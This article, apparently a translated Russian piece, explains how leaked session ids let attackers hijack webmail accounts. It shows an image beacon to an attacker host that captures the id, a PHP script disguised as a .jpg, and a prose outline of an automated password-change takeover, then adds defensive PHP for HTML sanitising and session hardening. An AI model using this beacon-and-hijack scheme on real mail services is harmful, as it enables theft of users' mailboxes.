
A Door in the Defences: the Webmail Interface

Today I want to tell the dear public how it is possible to steal mailboxes on some webmail services. I said "how it is possible", not "how it should be done"! Calm down, there will be nothing especially valuable in the way of a "young hacker's toolkit" in this note. It is just a demonstration of what PHP can do and of the shortcomings (scandalous shortcomings!) of some mail web interfaces.


A. V. Komlin, An assessment of Russian remote mail services: testing for errors in the web interface. A very useful article.


The HotBox.ru service is described.


The first round of testing showed that the server is vulnerable to the most elementary mistakes in stripping scripts and other dangerous tags, but that turned out not to be the worst of it.


As already noted, while working the user is identified by a random multi-digit identifier (id) and, of course (so I thought), by IP address and/or cookies. The test showed that this is not so! Having learned the value of id for a mailbox, it turned out to be possible to come in from another address, for example after the connection had dropped! Moreover, cookie support was not required either (though finding the cookies out, given the ability to run a script, would not have been a problem).


In fact, for unauthorized viewing of a mailbox it is enough to set up the simplest program that records requests to port 80 (or whatever port is given in the address), send the victim a letter containing an unfiltered tag that makes the browser automatically contact the attacking machine (for example, a link to a picture supposedly located at the hacker's IP address: <img src=http://attacker_host:port/anyname.gif width=1 height=1>) and, having waited until the victim goes to read his mail, look at the "Referer:" field in the headers of the request that arrives!



GET /anyname.gif HTTP/1.0
Referer: http://www.hotbox.ru/message.php?id=b[skip]14cf*index=6*array_index=5
Connection: Keep-Alive
...


The attacker only needs to turn off cookie support in his browser, type in the full address shown in Referer, and "work with the mail" in parallel (read letters, set up forwarding, ...) until the owner leaves it.


If the malefactor has no permanent network connection, he can use the holes in tag stripping to set up forwarding by means of scripting languages (for this an additional letter with a confirmation code has to be sent).


In fact, mailbox hijacking can be put on a production line, with no need to lie in wait for victims while sitting online.


So, we have a mail service which

a) authorizes users with a technology similar to PHP sessions;

b) does not check IP addresses;

c) does not check the contents of HTML-format letters;

d) does not require confirmation of changes to system settings.


And the content check should additionally consist of ruthlessly cutting out all pictures that do not come as attachments but are loaded from another address. ALL PICTURES, ALL!
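As an added defensive example (my code, not the article's or any mail service's), here is the "cut out all pictures" rule implemented for a PHP webmail: the letter's HTML is parsed, active content is removed, and every image that is not an attachment (cid:) or inline data (data:) is dropped before the page is rendered. The function name, the denylist and the sample letter are my own constructions.

```php
<?php
// Added defensive example, not code from the original article: sanitise an HTML letter
// before the webmail renders it. Active content goes, and so does every <img> that is
// not an attachment (cid:) or inline data (data:), so the reader's browser never
// contacts a third-party host while reading mail.
function sanitize_mail_html(string $html): string
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);                  // mail HTML is rarely well-formed
    $doc->loadHTML('<?xml encoding="UTF-8">' . $html); // libxml wraps the fragment in <html><body>
    libxml_clear_errors();
    $body = $doc->getElementsByTagName('body')->item(0);
    if ($body === null) {
        return '';
    }
    // Denylist of the obvious remote-loading/active elements (illustrative: a production
    // filter should instead allowlist the tags and attributes it permits).
    $forbidden = ['script', 'iframe', 'object', 'embed', 'link', 'meta', 'form', 'base'];
    $remove = [];
    foreach ($doc->getElementsByTagName('*') as $el) {
        $tag = strtolower($el->tagName);
        if (in_array($tag, $forbidden, true)) {
            $remove[] = $el;
            continue;
        }
        foreach (iterator_to_array($el->attributes) as $attr) {   // copy: the map is live
            $name = strtolower($attr->name);
            if (strpos($name, 'on') === 0 || $name === 'style') {
                $el->removeAttribute($attr->name);     // onerror=..., style="background:url(...)"
            }
        }
        if ($tag === 'img' && !preg_match('#^\s*(cid|data):#i', $el->getAttribute('src'))) {
            $remove[] = $el;                           // remote picture: the beacon the article describes
        }
    }
    foreach ($remove as $el) {                         // detach after the walk (the NodeList is live)
        $el->parentNode->removeChild($el);
    }
    $out = '';                                         // serialise only what was inside <body>
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// Constructed sample letter: a card referenced as an attachment plus a 1x1 beacon.
$letter = '<p>Happy birthday!</p><img src="cid:card@example">'
        . '<img src="http://attacker.example/anyname.gif" width=1 height=1 onerror="alert(1)">'
        . '<script>document.location="http://attacker.example/"</script>';
echo sanitize_mail_html($letter);
```

Only the paragraph and the cid: image survive; the remote image, its onerror handler and the script are gone before the browser sees the letter.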


We, cool hackers, use Apache+PHP.


1. We send letters in HTML format to various addresses at the mail service, containing the tag

<img src=http://www.server.com/picture.jpg>


For example, together with a greeting card. :)


2. In the directory with the card we put a .htaccess file with the following contents:



<Files "picture.jpg">
ForceType application/x-httpd-php
</Files>


3. Instead of the card we write a file picture.jpg with this code:



<?php
header("Content-type: image/jpeg");   // tell the browser a picture is coming (the card is a JPEG)
readfile("otkrytka.jpg");             // output the card bytes as-is (include would try to parse them as PHP)


4. And the greeting card itself we put in the file otkrytka.jpg. The ForceType directive in .htaccess makes the server process the .jpg file as a PHP script, which on finishing its job hands the user a picture, and there is no way to tell that the script did anything else. And the script does a simple thing: it parses the Referer it received, bites the session identifier out of it and... in two steps deprives the user of his mailbox. Nothing happens on the victim's machine; the script does everything on the attacker's server:


5. It opens a socket to the webmail, simulating submission of the system settings form (the variable names have to be written in by hand), namely a change of the password to one the attacker wants (and, for example, notifies the author that such-and-such a mailbox has been seized). To avoid arousing suspicion, the necessary headers can be forged: Referer, User-Agent and so on.


6. It opens a second socket, simulating a press of the "Log out" button.


* A socket is a network connection; in this case exactly the same kind as the connection between the web server and a browser.


THAT'S IT! THE USER HAS BEEN LEFT WITHOUT HIS MAILBOX before he has even had time to look at the picture properly. The next thing he will see is a message like "wrong password, enter it again".


It turns out that the hole in the protection of such a mail service (not Hotbox.ru, I should note; there something has been closed after all) is actually a whole door. The combination of passing the session identifier in the link (i.e. visible to everyone through the Referer field) instead of in a cookie, and the absence of an IP-address check, lets the malefactor seize control of a mailbox quickly and easily. Checking pictures does not save you here: nothing prevents inserting a link into the text of the letter which, when the user clicks on it, passes the session identifier to a script. Is convenience worth such victims? I think not.
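As an added defensive example (my code, not the article's or any mail service's), this is how a PHP webmail could close both holes the conclusion names: keep the session id in a cookie only, so it never lands in a link or a Referer, and bind the session to the client so an id presented from another address is rejected. The `client_fingerprint()` helper, the `$_SESSION` keys and the `/login.php` path are assumed names.

```php
<?php
// Added defensive example, not code from the original article.
// Goal: a session id that cannot leak through a link or Referer, and that is
// useless to anyone who presents it from a different client.

// 1. Cookie-only session ids: nothing is ever appended to URLs.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
ini_set('session.cookie_httponly', '1');      // unreadable by any script that slips past the mail filter
ini_set('session.cookie_secure', '1');        // assumes the webmail is served over HTTPS
ini_set('session.cookie_samesite', 'Strict'); // PHP >= 7.3
session_start();

// 2. Bind the session to the client. Constructed fingerprint: client IP + User-Agent.
function client_fingerprint(): string
{
    return hash('sha256',
        ($_SERVER['REMOTE_ADDR'] ?? '') . '|' . ($_SERVER['HTTP_USER_AGENT'] ?? ''));
}

if (!isset($_SESSION['client'])) {
    $_SESSION['client'] = client_fingerprint();          // fresh session: remember its owner
} elseif (!hash_equals($_SESSION['client'], client_fingerprint())) {
    // Same id, different address or browser: exactly the article's scenario. Drop it.
    $_SESSION = [];
    session_destroy();
    header('Location: /login.php?reason=session');       // assumed login page
    exit;
}

// 3. Issue a new id once the user has logged in, so an id captured earlier expires.
if (!empty($_SESSION['authenticated']) && empty($_SESSION['rotated'])) {
    session_regenerate_id(true);                          // true: discard the old session data
    $_SESSION['rotated'] = time();
}

// 4. Belt and braces: ask the browser not to send a Referer from webmail pages at all.
header('Referrer-Policy: no-referrer');
```

Binding to the IP address logs out users whose address changes mid-session (mobile networks, proxy pools); if that is a problem, fingerprint on User-Agent alone and rely on cookie-only ids plus regeneration. Password and forwarding changes should additionally require the current password, which closes the missing-confirmation hole the article lists.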